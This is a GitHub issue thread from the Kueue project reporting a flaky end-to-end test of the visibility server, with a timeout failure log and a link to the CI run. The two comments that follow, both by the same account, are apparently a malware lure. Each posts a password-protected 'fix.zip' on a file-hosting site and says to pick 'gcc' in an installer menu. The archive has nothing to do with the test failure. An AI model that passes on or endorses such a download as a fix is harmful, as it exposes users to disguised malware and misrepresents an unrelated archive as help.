### ISSUE TITLE
Flaky End To End Suite: Kueue visibility server when There are pending workloads due to capacity maxed by the admitted job

### ISSUE THREAD

**Issue by tenzen-y** [kubernetes-sigs/kueue#2920]
**What happened**:

Flaky End to End Test on "End To End Suite: kindest/node:v1.29.4: [It] Kueue visibility server when There are pending workloads due to capacity maxed by the admitted job Should allow fetching information about pending workloads in ClusterQueue"

```shell
{Timed out after 5.001s.
Expected
    <int>: 0
to equal
    <int>: 1 failed [FAILED] Timed out after 5.001s.
Expected
    <int>: 0
to equal
    <int>: 1
In [It] at: /home/prow/go/src/kubernetes-sigs/kueue/test/e2e/singlecluster/visibility_test.go:174 @ 08/27/24 21:24:32.932
}
```

**What you expected to happen**:

Any errors have never been seen.

**How to reproduce it (as minimally and precisely as possible)**:

https://prow.k8s.io/view/gs/kubernetes-jenkins/logs/periodic-kueue-test-e2e-main-1-29/1828542136862117888

<img width="1016" alt="Screenshot 2024-08-28 at 14 04 41" src="https://github.com/user-attachments/assets/a9bb8bd0-389f-49b5-93ba-831c1a5c2a19">

**Anything else we need to know?**:

**Environment**:
- Kubernetes version (use `kubectl version`):
- Kueue version (use `git describe --tags --dirty --always`):
- Cloud provider or hardware configuration:
- OS (e.g: `cat /etc/os-release`):
- Kernel (e.g. `uname -a`):
- Install tools:
- Others:

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
